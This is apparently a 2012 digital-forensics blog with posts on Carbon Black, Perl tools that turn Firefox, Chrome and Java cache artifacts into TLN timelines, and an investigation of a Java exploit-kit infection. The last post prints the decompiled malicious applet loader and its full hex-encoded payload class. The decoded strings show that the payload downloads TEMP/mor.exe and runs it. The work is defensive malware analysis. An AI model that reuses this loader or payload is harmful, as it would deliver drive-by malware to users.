Droppercheck was as simple to turn on as selecting a checkbox; the other plugins had a number of options to configure. Within minutes I had all the plugins I wanted activated successfully.



Once the client was installed I thought the best way to test it was to start hitting sites listed on the Malware Domain List and see what samples I could download to my test workstation. After spending a few minutes hitting random URLs I managed to get a malicious binary onto the machine.

Now that I had my malicious executable I was keen to understand what the VirusTotal plugin had detected. First I checked the plugin's summary page and could see some detections already.

I clicked on the infected binaries link and was presented with the following screen.

Clicking on any of the links showed me the VirusTotal results. I also checked my VirusTotal account to see whether the uploaded files were listed under API submissions, and sure enough I had some results there too.

So from a malware-detection perspective it's safe to say that Carbon Black provides a significant benefit to organisations. AV is far from perfect and is struggling to keep up with sample volumes, so having your files run against VirusTotal automatically, plus access to all of the autorun-type registry keys, is a huge advantage. Too often these days I see a huge amount of faith put in a tool that should automatically detect malicious activity based on signatures or patterns. I like that Carbon Black gives me a means to access the information that is important to me or my employer. This also made me wonder what other information I could source from the tool. I knew that I'd run some SysInternals tools, and I wondered what I could find relating to those.

I searched for *sysinternals* within the registry modifications search, and the first three entries showed the MUICache entries for each of these tools.

As the links below highlight, Carbon Black offers much more than just searching for malicious executables or indications of persistence. Information that we typically wouldn't have access to until a forensic investigation is now available in the form of an easy and fast search across our entire fleet, letting us confirm the state of our environment.

I would be keen to understand the amount of bandwidth and storage required to maintain this solution over the long term in a large global organisation. In comparison to SIEM-type tools or full packet capture I would expect the footprint to be relatively small. Do any of you have success stories in large environments?

Well, I hope you gained something from this post. As always I'd be keen to hear from my readers about their successes or issues with this tool.

Some other articles written on Carbon Black:

Sunday, 16 September 2012

TLN tools updated - New features added

I've been continuing to play with and refine some of the tools I've recently posted. As mentioned, they were only beta and I still consider them to be just that. As always, use the tools at your own risk; I provide no warranty for the results they produce. In saying that, as we continue to refine them, hopefully my readers will see consistent and expected results. One other issue with posting my tools is that when the code is copied into a text file you can hit problems running it: spaces added at the end of the file can cause Perl EOF errors, which can be confusing if you're new to Perl. To resolve this I've created my own Google Code repository and uploaded both the Perl scripts and the executables. Hopefully this will resolve that issue.

You can find this repository and the tools at the following location.

The reason for the following changes to the Firefox and Chrome scripts was that they weren't very useful from an automated perspective, because Firefox stores the user profile in a randomly named folder, e.g. "xxxxxxxx.default". By first creating a file listing with tsk fls to produce a bodyfile, the output can then be parsed to automatically find the required files for the timeline. The other benefit is that many users don't keep their history in the default profile location due to profile storage space; it's not uncommon to find the browser history files in the root of the C drive because the user has moved them, and my tools still accommodate this scenario.

Firefox script:
 - Added the -d option to allow parsing of the downloads.sqlite database to TLN format
 - Added the -a option, which uses the bodyfile output from tsk fls and parses each places/downloads.sqlite database discovered within it
 - Added the -u option to include the username within the TLN format

Chrome script:
 - Added the -d option to allow parsing of the downloads table within the History sqlite database
 - Added the -a option, which uses the bodyfile output from tsk fls and parses each History sqlite database discovered within it
 - Added the -u option to include the username within the TLN format

IDX script:
 - Resolved a bug where IDX files that contained output on multiple lines were not parsed correctly
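For anyone unfamiliar with TLN, the records these options emit are simple five-field, pipe-delimited lines, time|source|system|user|description, with the time expressed as Unix epoch seconds in UTC. A minimal sketch of assembling one such record (the system name, user and URL below are made-up illustration values):

```java
public class TlnRecord {

    // Build one pipe-delimited TLN line: time|source|system|user|description
    static String tln(long epochUtc, String source, String system,
                      String user, String description) {
        return epochUtc + "|" + source + "|" + system + "|" + user + "|" + description;
    }

    public static void main(String[] args) {
        // 1344350337 == 07 Aug 2012 14:38:57 UTC
        System.out.println(tln(1344350337L, "JAVA", "WORKSTATION1", "jdoe",
                "http://example.com/malicious.jar"));
        // prints: 1344350337|JAVA|WORKSTATION1|jdoe|http://example.com/malicious.jar
    }
}
```

Because every tool writes the same five fields, output from different scripts can simply be concatenated and sorted on the first field to build a timeline.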

As mentioned above, I've added each of the files to the code repository. Any Perl gurus out there might be able to spot issues with my code or more efficient ways of writing the tools. Please feel free to update them and let me know about any changes so we can all benefit. I'd be really keen to hear whether anybody is finding the tools beneficial to their investigations, and perhaps see some examples too. Feel free to add thanks or issues in the comments below; I look forward to your feedback.

I have a number of future scripts in mind for adding logs to the TLN format. If any of you require a script, feel free to let me know and I'll see if I can help out. That said, for anybody with some basic scripting skills, Perl is very easy to pick up, as are some basic regex queries. Before you know it, any file containing a date and something useful can be added to your timelines to assist with your investigations.
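To illustrate how far a basic regex query gets you, here is a small sketch (in Java rather than Perl, with a made-up log line) that pulls a "dd Mon yyyy hh:mm:ss" timestamp out of an arbitrary line of text, which is the first step in turning any dated file into TLN events:

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class DatedLineGrep {

    // Matches timestamps of the form "07 Aug 2012 14:38:57"
    static final Pattern TS = Pattern.compile(
            "[0-3][0-9] [A-Z][a-z]{2} [0-9]{4} [0-2][0-9]:[0-5][0-9]:[0-5][0-9]");

    // Return the first timestamp found on the line, or null if there is none
    static String firstTimestamp(String line) {
        Matcher m = TS.matcher(line);
        return m.find() ? m.group() : null;
    }

    public static void main(String[] args) {
        System.out.println(firstTimestamp("entry: 07 Aug 2012 14:38:57 GET /index.html"));
        // prints: 07 Aug 2012 14:38:57
    }
}
```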

Wednesday, 15 August 2012

Java Forensics using TLN Timelines

Based on my two previous posts I thought it might be a good time to see how we can introduce some of the Java artifacts we've reviewed. I decided to create a Perl script that parses .idx files within the Java cache into TLN format for import into our timelines. I hope this script will give analysts greater context in their investigations and a quick way to eyeball URLs within the idx files for anything potentially malicious. It's important to note that this script is again in BETA and further testing is required before you should trust the results in your own investigations.

I had a strong response to my last post on TLN and browser forensics; however, a number of users hit issues when copying the code and attempting to run it, with errors such as "Can't find string terminator "EOT" anywhere before EOF at C:\ line 31". If you get this error, you most likely need to remove the two spaces after EOT and the one space before EOT at the very end of the file. I'm also in the process of organising a Google Code repository, which should resolve this issue.

With that said, let's take a look at the script.

 #! c:\perl\bin\perl.exe  
 # Parse .idx files within the Java cache to TLN format  
 # Version: 0.1 (BETA)  
 # Examples:  
 use strict;  
 use Getopt::Long;  
 use File::Find;  
 use Regexp::Common qw /URI/;  
 use Time::Local;  
 my %config = ();  
 GetOptions(\%config, qw(path|p=s system|s=s user|u=s help|?|h));  
 if ($config{help} || ! %config) {  
     _syntax();  
     exit 1;  
 }  
 die "You must enter a path.\n" unless ($config{path});  
 my $path = $config{path};  
 my @files;  
 my %months = ('Jan'=>'01','Feb'=>'02','Mar'=>'03','Apr'=>'04','May'=>'05','Jun'=>'06','Jul'=>'07','Aug'=>'08','Sep'=>'09','Oct'=>'10','Nov'=>'11','Dec'=>'12');  
 # Recursively collect every file (not directory) under the supplied path  
 find( sub { push @files, $File::Find::name unless -d; }, $path );  
 for my $file (@files) {  
     my ($ext) = $file =~ /(\.[^.]+)$/;  
     next unless (defined $ext && $ext eq ".idx");  
     $file =~ s/\\/\//g;  
     open( FILE, "< $file" ) or die "Can't open $file : $!";  
     while (my $line = <FILE>) {  
         # Grab the "dd Mon yyyy hh:mm:ss" timestamps and http(s) URLs on the line  
         my @timestamps = $line =~ m/[0-3][0-9] [a-zA-Z][a-z][a-z] [0-9][0-9][0-9][0-9] [0-2][0-9]:[0-5][0-9]:[0-5][0-9]/g;  
         my @url = $line =~ m/($RE{URI}{HTTP}{-scheme => qr(https?)})/g;  
         next unless (@timestamps > 1 && @url);  
         $timestamps[1] = getEpoch($timestamps[1]);  
         print $timestamps[1]."|JAVA|".$config{system}."|".$config{user}."|".$url[0]."\n";  
     }  
     close(FILE);  
 }  
 sub getEpoch {  
     my $time = substr( $_[0], index($_[0], ' ', 10)+1 );  
     my $date = substr( $_[0], 0, index($_[0], ' ', 10) );  
     my ($hr,$min,$sec) = split(/:/,$time,3);  
     my ($dd,$mm,$yyyy) = split(/ /,$date,3);  
     $mm = $months{$mm};  
     $mm =~ s/^0//;  
     my $epoch = timegm($sec,$min,$hr, $dd,($mm)-1,$yyyy);  
     return $epoch;  
 }  
 sub _syntax {  
 print<< "EOT";  
 Parse Java cache IDX files  
  -p Path..................path to java cache  
  -s Systemname............add systemname to appropriate field in tln file  
  -u user..................add user (or SID) to appropriate field in tln file  
  -h ......................Help (print this information)  
 Ex: C:\\> -p "C:\\Documents and Settings\\userprofile\\Application Data\\Sun\\Java\\Deployment\\cache" -s %COMPUTERNAME% -u %USERNAME% > events.txt  
 **All times printed as GMT/UTC  
 copyright 2012 Sploit  
EOT
 }  

I'm not a programmer by any means, so I do my best with my coding, but if anybody has views on performance improvements or spots bugs, let me know. I'm not sure whether it's possible to have an IDX file without the values I'm looking for, so if you have any idx files without a date listed within them, my script will most likely fail. I've also added some examples of the output within the script, but I'll list them here as well to highlight a few cases.


Also note that there are typically two timestamps within an IDX file: one listed as "date" and one as "last modified". In this instance I'm using the "date" value to produce the TLN entry, as from what I've seen it appears to be the time the incident occurred.
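If you want to sanity-check the epoch values the script produces, the same "dd Mon yyyy hh:mm:ss" to epoch conversion can be reproduced with standard Java date handling; a rough sketch, not part of the tool itself:

```java
import java.text.SimpleDateFormat;
import java.util.Locale;
import java.util.TimeZone;

public class IdxEpoch {

    // Convert an IDX-style timestamp ("dd MMM yyyy HH:mm:ss", GMT/UTC)
    // into Unix epoch seconds
    static long toEpoch(String timestamp) throws Exception {
        SimpleDateFormat fmt = new SimpleDateFormat("dd MMM yyyy HH:mm:ss", Locale.ENGLISH);
        fmt.setTimeZone(TimeZone.getTimeZone("UTC"));
        return fmt.parse(timestamp).getTime() / 1000L;
    }

    public static void main(String[] args) throws Exception {
        System.out.println(toEpoch("07 Aug 2012 14:38:57")); // 1344350337
    }
}
```

Forcing the UTC time zone matters here: without it the parse silently uses the analysis machine's local zone and every event in the timeline shifts by that offset.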

Let me know if you find this script of value and if you find any bugs. As mentioned, I'll hopefully upload the script to my own Google Code repository shortly, and I'll let you all know when it's available in case you're having trouble getting it to work.

Thursday, 9 August 2012

Java Exploit Toolkits - Part 2: Deobfuscating Java Exploit Toolkits

Let's continue with Part 2 of the series on Java exploit toolkits. The following post is a beginner's attempt to deobfuscate an obfuscated jar file (what a tongue twister), and I hope that by documenting my attempt others may be able to suggest more efficient ways to conduct this deobfuscation.

I posted Part 1 of this series because this particular incident was very similar; it was only due to my experience with the previous incident that I was able to quickly identify artifacts of interest in the incident I'll now discuss.

Again I received an image of a machine and was notified that antivirus had detected the following file:

 Trojan.FakeAV - C:\Documents and Settings\username\Local Settings\Application Data\{762f1d12-0d4c-e201-bd96-7cb3501bb3b0}\n  

I immediately noticed the similarity between this incident and the previous one. I decided to start with the event logs again; however, in this instance I found a single entry and none of the tamper protection events I'd seen in Part 1.

 Security Risk Found!Trojan.FakeAV in File: C:\Documents and Settings\username\Local Settings\Application Data\{762f1d12-0d4c-e201-bd96-7cb3501bb3b0}\n by: Auto-Protect scan. Action: Cleaned by Deletion. Action Description: The file was deleted successfully.   

I decided the next logical step was to create a directory listing and review what occurred around the time of the alert. Reviewing the listing, I did not find any artifacts of interest. Based on my knowledge of the previous incident, I searched the directory listing for .idx files and found the following:

 -A------- 2012-08-07 14:39:00.704 2012-08-07 14:38:57.986 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\lastAccessed  
 -A------- 2012-08-07 14:39:00.689 2012-08-07 14:39:00.658 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\74367697-78280468.idx  
 -A------- 2012-08-07 14:39:00.673 2012-08-07 14:39:00.658 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\74367697-78280468  
 D-------- 2012-08-07 14:39:00.673 2012-08-07 14:38:49.79 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\..  
 D-------- 2012-08-07 14:39:00.673 2012-08-07 14:38:49.79 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\.  
 D-------- 2012-08-07 14:39:00.673 2012-08-07 14:38:49.79 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23  
 D-------- 2012-08-07 14:38:57.986 2012-08-07 14:38:48.954 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\..  
 D-------- 2012-08-07 14:38:57.986 2012-08-07 14:38:48.954 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\.  
 D-------- 2012-08-07 14:38:57.986 2012-08-07 14:38:48.954 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0  
 -A------- 2012-08-07 14:38:57.954 2012-08-07 14:38:56.908 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\bffc1b9-44cf1245.idx  
 D-------- 2012-08-07 14:38:57.470 2012-08-07 14:38:49.236 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\..  
 D-------- 2012-08-07 14:38:57.470 2012-08-07 14:38:49.236 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\.  
 D-------- 2012-08-07 14:38:57.470 2012-08-07 14:38:49.236 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57  
 -A------- 2012-08-07 14:38:57.454 2012-08-07 14:38:57.64 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\bffc1b9-44cf1245  
 -A------- 2012-08-07 14:38:55.64 2012-08-07 14:38:55.64 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\host\c312ea1-3e1f76dc.hst  
 D-------- 2012-08-07 14:38:55.64 2012-08-07 14:38:48.970 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\host\..  
 D-------- 2012-08-07 14:38:55.64 2012-08-07 14:38:48.970 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\host\.  
 -A------- 2012-08-07 14:38:50.892 2012-08-07 14:38:48.673 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\  
 -A------- 2012-08-07 14:38:50.829 2012-08-07 14:38:50.829 c:\Documents and Settings\username\Local Settings\Temp\java_install_reg.log  

At this point I wasn't sure whether these idx files were part of the incident, but based on the previous incident I decided they might be a good place to start.



At this point the URLs discovered in these files definitely looked suspicious, but I still needed more information. I decided the next step was to look at some of the other files I've highlighted in orange above.


I exported the file listed above and uploaded it to VirusTotal. Here are the results. Although there were only 3 hits, that was enough to raise further suspicion. I renamed the file with a .jar extension and attempted to open it with jd-gui, unfortunately without success. I also tried renaming the file to .exe and running it through Anubis, but that didn't work either. At this point I wasn't sure what my next step with this file could be, so I decided to move on and focus on one of the other files. If anybody has advice on this file, I'd be keen to hear what my next steps might be.


Again I uploaded the file listed above to VirusTotal to confirm any detections. Here are the results. At this point I was fairly sure I'd identified the initial infection vector. Once again I added the .jar extension to the file and attempted to open it with jd-gui. SUCCESS! Here is the initial view when opening the file in jd-gui.

I reviewed each of the classes above. The first two basically looked like obfuscation and padding techniques to evade antivirus, so I decided to spend my time focusing on O3. Below is what I saw when opening O3:

 import java.lang.reflect.Method;  
 class O3 extends ClassLoader  
  static ProtectionDomain pd;  
  public static char char_at(String paramString, int paramInt)  
   return paramString.charAt(paramInt);  
  public static Method get_func(Class paramClass) throws Exception  
   return paramClass.getClass().getMethod("newInstance", new Class[0]);  
  public static void invoke(Method paramMethod, Class paramClass) throws Exception  
   paramMethod.invoke(paramClass, new Object[0]);  
  public static String get_perm_name()  
   return new StringBuffer("setSec").toString() + "urityManager";  
  public static byte[] string_to_bytes(String paramString)  
   byte[] arrayOfByte = new byte[paramString.length() / 2];  
    Permissions localPermissions = new Permissions();  
    localPermissions.add(new RuntimePermission(get_perm_name()));  
    pd = new ProtectionDomain(new CodeSource(new URL(new StringBuffer("file:").toString() + "///"), new Certificate[0]), localPermissions);  
   catch (Exception localException) {  
   int i = paramString.length();  
   for (int j = 0; j < i; j += 2)  
    int k = (Character.digit(char_at(paramString, j), 16) << 4) + Character.digit(char_at(paramString, j + 1), 16);  
    k = (k - 3) % 256;  
    arrayOfByte[(j / 2)] = (byte)k;  
   return arrayOfByte;  
  public static void load(O3 paramO3)  
    int i = 1;  
    String[] arrayOfString = { "CD01BDC10303033303810D032A03350D033603370A03380D0339033A0B033B0B033C0D0339033D0A033E0A033F0B03400D034103420D030C03430D030C03440D030B03450A03460A03470A03480D031403350B03490D0339034A0D0314034B0B034C0D0314034D0D031303430D0312034E0D030B034F0B03500D035103520B03530B03540B03550D031203560D030B03570D031203570D035803590D0358035A0A035B0A035C0A035D0A035E0403093F6C716C77410403062B2C59040307467267680403124F6C71685178706568755764656F680403067578710403172B2C4F6D647964326F64716A3252656D6866773E04030D487B666873776C72717604030D567278756668496C6F6804030B464F37316D6479640F032C032D0A035F0F0360036104032A6D6479643276686678756C777C3253756C796C6F686A68674466776C7271487B666873776C72710A03620F036303640403116B777773316E686873646F6C796804030869646F76680F0365036604031E6D647964326C723245786969687568674C7173787756777568647004030F6D647964327168773258554F040403", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "23232323232323232323232323232323232323234B5757733D32327A7A7A3170", "6C716873666C31737572325337694F456C774D30537B4E35327C58443B367048", "0A03670F036803690F032C036A0F036B036C0F032C036D04031F6D647964326C7232457869696875686752787773787756777568647004031B6D647964326C7232496C6F685278777378775677756864700403196D647964326F64716A325677756C716A457869696875040307574850530F036E036F0F0370037104030B3270727531687B680F037203690F032C03730F03740375040308", "333333373A", "0A03760F03770378040308", "3333343439", "040308", "3333343533", "040308", "3333333A37", 
"0F0379037A0F037B032D0A037C0F037D037E0F037F03800403166D647964326F64716A32487B666873776C7271040306464F370403136D647964326F64716A3252656D68667704032A6D6479643276686678756C777C3253756C796C6F686A6867487B666873776C72714466776C72710403216D6479643276686678756C777C324466666876764672717775726F6F687504030F677253756C796C6F686A68670403402B4F6D6479643276686678756C777C3253756C796C6F686A6867487B666873776C72714466776C72713E2C4F6D647964326F64716A3252656D6866773E0403136D647964326F64716A32567C7677687004031576687756686678756C777C506471646A68750403212B4F6D647964326F64716A3256686678756C777C506471646A68753E2C5904030E766877537572736875777C04033B2B4F6D647964326F64716A325677756C716A3E4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A3E0403136D647964326F64716A325677756C716A04030777756C700403172B2C4F6D647964326F64716A325677756C716A3E0403182B4F6D647964326F64716A325677756C716A3E2C5904030D7273687156777568647004031A2B2C4F6D647964326C72324C717378775677756864703E04031B2B4F6D647964326C72324C717378775677756864703E2C590403096A68776871790403292B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A3E04030964737368716704032F2B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A4578696968753E04030B77725677756C716A04031D2B4F6D647964326C72325278777378775677756864703E4C2C590403077568646704030A2B5E454C4C2C4C0403146D647964326F64716A324C7177686A687504030B73647576684C71770403182B4F6D647964326F64716A325677756C716A3E2C4C0403087A756C776804030A2B5E454C4C2C59040308666F7276680403146D647964326F64716A32557871776C706804030D6A6877557871776C70680403182B2C4F6D647964326F64716A32557871776C70683E040307687B686604032A2B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A32537572666876763E03240329032A0304032B030303050304032C032D0304032E0303034103040305030303112DBA03042DBB03055AAA03074FB403040307030C030F03060304032F0303031903080303030C0307030F030C0314030F0311031003150304033003310305032E030304B10309030A0303042904BB0307140703BF0B4F0640064115081509BB030A5ABE030B5CBE030
C5C150DB9030EBA030FB90310BA03113D07BE03125CBE03135CBE03145CBA03151516BB0317B903181519B90318B9031ABA031B140703BA031C3D081C072E06140703B9031D5C409E0393201F634106390918091FA5037B201F67180963141303A40309AA036C201F671809630A739D03162E18095F36151EBB031F859457AA034B201F671809630A7307A303162E18095F361520BB031F859457AA032F201F671809630A7308A303162E18095F361521BB031F859457AA03132E18095F361522BB031F859457870904AA028B1C082E061FB90323AA026A1C07B903241C08B90325BB03263D091C09BE03145CBA03151516BB0317B903181519B90318B9031AB903275AAA03074F04B3030403070423042603280304032F03030371031E030303190307031C030D031D0311031F0319032003310321035B0322036A0324036E032503770327038303290386032B0391032D03A1032F03AD033103BD033303C9033503D9033903E6032503EC033C03F7033E03FC033F03010340040603410423034604260343042703470332030303070304032803040333030303050334" };  
    StringBuilder localStringBuilder = new StringBuilder();  
    for (int j = 0; j < arrayOfString.length; j++)  
    byte[] arrayOfByte = string_to_bytes(localStringBuilder.toString());  
    Class localClass = paramO3.defineClass(null, arrayOfByte, 0, arrayOfByte.length, pd);  
    invoke(get_func(localClass), localClass);  
   catch (Exception localException)  

Basically, from what I can gather, this class creates an array of strings, which I've highlighted in red. It then passes the array to the public static byte[] string_to_bytes(String paramString) method, which deobfuscates the contents. At this point I was pretty lost, but I wanted to deobfuscate the strings in the hope that they would give me a better understanding and potentially some new artifacts to search for within my image.
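The string_to_bytes transform is straightforward once isolated: each pair of hex digits becomes one byte, which is then shifted down by 3 modulo 256. A standalone sketch of the same decode, using a short hex sequence taken from inside one of the strings above:

```java
public class HexDecode {

    // Reimplements the exploit's string_to_bytes(): hex pair -> byte,
    // then subtract 3 (mod 256) from each byte
    static String decode(String hex) {
        byte[] out = new byte[hex.length() / 2];
        for (int j = 0; j < hex.length(); j += 2) {
            int k = (Character.digit(hex.charAt(j), 16) << 4)
                  + Character.digit(hex.charAt(j + 1), 16);
            out[j / 2] = (byte) ((k - 3) % 256);
        }
        // ISO-8859-1 maps each byte straight to the same char value
        return new String(out, java.nio.charset.StandardCharsets.ISO_8859_1);
    }

    public static void main(String[] args) {
        System.out.println(decode("6D647964326F64716A")); // prints: java/lang
    }
}
```

Feeding class-path fragments like this through the decoder is a quick way to confirm the cipher before committing to decoding the full payload.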

I decided to create my own Java application based on the class above; it would be a good chance to dust off some Java skills I'd happily left in the past. I installed the Java JDK and then downloaded the Eclipse IDE, which I was familiar with.

I created the following class based on the output above; again, I'm sure there are more efficient ways of doing this. My aim was to produce a text file containing the deobfuscated strings. My class is as follows:

 import java.lang.reflect.Method;  
 public class exploitMain {  
    * @param args  
   public static void main(String[] args) {  
   public static char char_at(String paramString, int paramInt)  
     return paramString.charAt(paramInt);  
   public static byte[] string_to_bytes(String paramString)  
     byte[] arrayOfByte = new byte[paramString.length() / 2];  
     int i = paramString.length();  
     for (int j = 0; j < i; j += 2)  
      int k = (Character.digit(char_at(paramString, j), 16) << 4) + Character.digit(char_at(paramString, j + 1), 16);  
      k = (k - 3) % 256;  
      arrayOfByte[(j / 2)] = (byte)k;  
     return arrayOfByte;  
    public static void load()  
       int i = 1;  
       String[] arrayOfString = { "CD01BDC10303033303810D032A03350D033603370A03380D0339033A0B033B0B033C0D0339033D0A033E0A033F0B03400D034103420D030C03430D030C03440D030B03450A03460A03470A03480D031403350B03490D0339034A0D0314034B0B034C0D0314034D0D031303430D0312034E0D030B034F0B03500D035103520B03530B03540B03550D031203560D030B03570D031203570D035803590D0358035A0A035B0A035C0A035D0A035E0403093F6C716C77410403062B2C59040307467267680403124F6C71685178706568755764656F680403067578710403172B2C4F6D647964326F64716A3252656D6866773E04030D487B666873776C72717604030D567278756668496C6F6804030B464F37316D6479640F032C032D0A035F0F0360036104032A6D6479643276686678756C777C3253756C796C6F686A68674466776C7271487B666873776C72710A03620F036303640403116B777773316E686873646F6C796804030869646F76680F0365036604031E6D647964326C723245786969687568674C7173787756777568647004030F6D647964327168773258554F040403", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "23232323232323232323232323232323232323234B5757733D32327A7A7A3170", "6C716873666C31737572325337694F456C774D30537B4E35327C58443B367048", "0A03670F036803690F032C036A0F036B036C0F032C036D04031F6D647964326C7232457869696875686752787773787756777568647004031B6D647964326C7232496C6F685278777378775677756864700403196D647964326F64716A325677756C716A457869696875040307574850530F036E036F0F0370037104030B3270727531687B680F037203690F032C03730F03740375040308", "333333373A", "0A03760F03770378040308", "3333343439", "040308", "3333343533", "040308", "3333333A37", 
"0F0379037A0F037B032D0A037C0F037D037E0F037F03800403166D647964326F64716A32487B666873776C7271040306464F370403136D647964326F64716A3252656D68667704032A6D6479643276686678756C777C3253756C796C6F686A6867487B666873776C72714466776C72710403216D6479643276686678756C777C324466666876764672717775726F6F687504030F677253756C796C6F686A68670403402B4F6D6479643276686678756C777C3253756C796C6F686A6867487B666873776C72714466776C72713E2C4F6D647964326F64716A3252656D6866773E0403136D647964326F64716A32567C7677687004031576687756686678756C777C506471646A68750403212B4F6D647964326F64716A3256686678756C777C506471646A68753E2C5904030E766877537572736875777C04033B2B4F6D647964326F64716A325677756C716A3E4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A3E0403136D647964326F64716A325677756C716A04030777756C700403172B2C4F6D647964326F64716A325677756C716A3E0403182B4F6D647964326F64716A325677756C716A3E2C5904030D7273687156777568647004031A2B2C4F6D647964326C72324C717378775677756864703E04031B2B4F6D647964326C72324C717378775677756864703E2C590403096A68776871790403292B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A3E04030964737368716704032F2B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A4578696968753E04030B77725677756C716A04031D2B4F6D647964326C72325278777378775677756864703E4C2C590403077568646704030A2B5E454C4C2C4C0403146D647964326F64716A324C7177686A687504030B73647576684C71770403182B4F6D647964326F64716A325677756C716A3E2C4C0403087A756C776804030A2B5E454C4C2C59040308666F7276680403146D647964326F64716A32557871776C706804030D6A6877557871776C70680403182B2C4F6D647964326F64716A32557871776C70683E040307687B686604032A2B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A32537572666876763E03240329032A0304032B030303050304032C032D0304032E0303034103040305030303112DBA03042DBB03055AAA03074FB403040307030C030F03060304032F0303031903080303030C0307030F030C0314030F0311031003150304033003310305032E030304B10309030A0303042904BB0307140703BF0B4F0640064115081509BB030A5ABE030B5CBE030
C5C150DB9030EBA030FB90310BA03113D07BE03125CBE03135CBE03145CBA03151516BB0317B903181519B90318B9031ABA031B140703BA031C3D081C072E06140703B9031D5C409E0393201F634106390918091FA5037B201F67180963141303A40309AA036C201F671809630A739D03162E18095F36151EBB031F859457AA034B201F671809630A7307A303162E18095F361520BB031F859457AA032F201F671809630A7308A303162E18095F361521BB031F859457AA03132E18095F361522BB031F859457870904AA028B1C082E061FB90323AA026A1C07B903241C08B90325BB03263D091C09BE03145CBA03151516BB0317B903181519B90318B9031AB903275AAA03074F04B3030403070423042603280304032F03030371031E030303190307031C030D031D0311031F0319032003310321035B0322036A0324036E032503770327038303290386032B0391032D03A1032F03AD033103BD033303C9033503D9033903E6032503EC033C03F7033E03FC033F03010340040603410423034604260343042703470332030303070304032803040333030303050334" };  
       StringBuilder localStringBuilder = new StringBuilder();  
       for (int j = 0; j < arrayOfString.length; j++) {  
         // loop body lost in the decompile; presumably concatenates the chunks of arrayOfString  
       }  
       byte[] arrayOfByte = string_to_bytes(localStringBuilder.toString());  
       String temp = bytesToStringUTFCustom(arrayOfByte);  
     } catch (Exception localException) {  
     }  

     public static String bytesToStringUTFCustom(byte[] bytes) {  
       char[] buffer = new char[bytes.length];  
       for (int i = 0; i < bytes.length; i++) {  
         // per-byte conversion lost in the decompile  
       }  
       return new String(buffer);  
     }  

     public static void writeToText(String output) throws IOException {  
       File file = new File("c:/output.txt");  
       BufferedWriter bo = new BufferedWriter(new FileWriter(file));  
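Out of curiosity, the encoding in the string array above looks like a simple byte shift: subtracting 3 from each hex byte yields readable class names (for example, `6D647964` decodes to `java`). Below is a minimal sketch of such a decoder; the class and method names are my own, not the applet's.

```java
// Sketch only: decodes hex strings obfuscated with a +3 byte shift,
// which appears to match the string array in the decompiled applet above.
public class Deobfuscate {
    public static String decode(String hex) {
        StringBuilder out = new StringBuilder();
        for (int i = 0; i + 1 < hex.length(); i += 2) {
            // take each pair of hex digits and shift the byte value back by 3
            int b = Integer.parseInt(hex.substring(i, i + 2), 16);
            out.append((char) (b - 3));
        }
        return out.toString();
    }

    public static void main(String[] args) {
        System.out.println(decode("6D647964326F64716A")); // prints "java/lang"
    }
}
```

Running recognisable chunks of the blob through this quickly surfaces the class and method names the applet is hiding.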

It was rushed, so it's fairly messy and I haven't commented it. If you want to know anything further about it, please feel free to leave a comment and I'll get back to you as soon as I can. Finally, I reviewed my text file for further information.

 [Raw dump of the class file; the unprintable bytes have been omitted here. The readable constant-pool strings it contains are:]

   <init>  ()V  Code  LineNumberTable  run  ()Ljava/lang/Object;  SourceFile
   java/security/PrivilegedActionException
   http.keepalive  false
   java/io/BufferedInputStream  java/net/URL
   HTTp://
   java/io/BufferedOutputStream  java/io/FileOutputStream
   java/lang/StringBuffer  TEMP  /mor.exe
   00047  00116  00120  00074
   java/lang/Exception  CL4
   java/lang/Object  java/security/PrivilegedExceptionAction
   java/security/AccessController  doPrivileged  (Ljava/security/PrivilegedExceptionAction;)Ljava/lang/Object;
   java/lang/System  setSecurityManager  (Ljava/lang/SecurityManager;)V
   setProperty  java/lang/String  trim
   openStream  getenv  append  toString  read
   java/lang/Integer  parseInt  write  close
   java/lang/Runtime  getRuntime  exec
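Output like the above is what you get by pulling printable runs out of the class file, much as the Unix `strings` command does. A rough Java equivalent, for anyone without `strings` to hand (the file name `CL4.class` is hypothetical; substitute whatever you exported):

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Paths;

// Extracts runs of printable ASCII (minLen or more characters) from a binary
// file - a rough equivalent of the Unix `strings` command.
public class ClassStrings {
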